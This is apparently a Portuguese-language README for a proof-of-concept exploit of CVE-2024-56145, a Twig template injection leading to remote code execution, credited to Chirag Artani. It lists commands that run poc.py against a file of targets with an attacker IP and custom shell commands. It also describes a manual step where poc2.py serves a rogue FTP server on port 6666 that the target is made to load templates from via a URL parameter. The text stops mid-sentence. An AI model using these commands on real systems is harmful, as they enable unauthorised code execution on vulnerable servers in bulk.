
CVE-2024-56145 SSTI para RCE - modelos twig
fuser -k 6666/tcp
python3 poc.py -f targets.txt -i 127.0.0.1 -pr 4 -t 200
Comando personalizado pode ser usado como python3 poc.py -f targets.txt -i 127.0.0.1 -c "whoami"
-i é o seu IP ou o IP do seu VPS (use isso executando ipconfig / ifconfig.
Como - python3 poc.py -f targets.txt -i 165.22.104.140 -pr 4 -t 200
E agora? Você tem um alvo vulnerável, mas quer jogar mais? Então adicionei o poc2.py para teste manual contra o alvo. Como fazer isso?
faça fuser -k 6666/tcp
1. Execute o poc2.py (porta 6666 iniciada como FTP).
2. Abra o navegador yourtarget.com/?--templatesPath=ftp://VPS-IP:6666/
3. você verá -

Escrito por Chirag Artani (https://x.com/Chirag99Artani)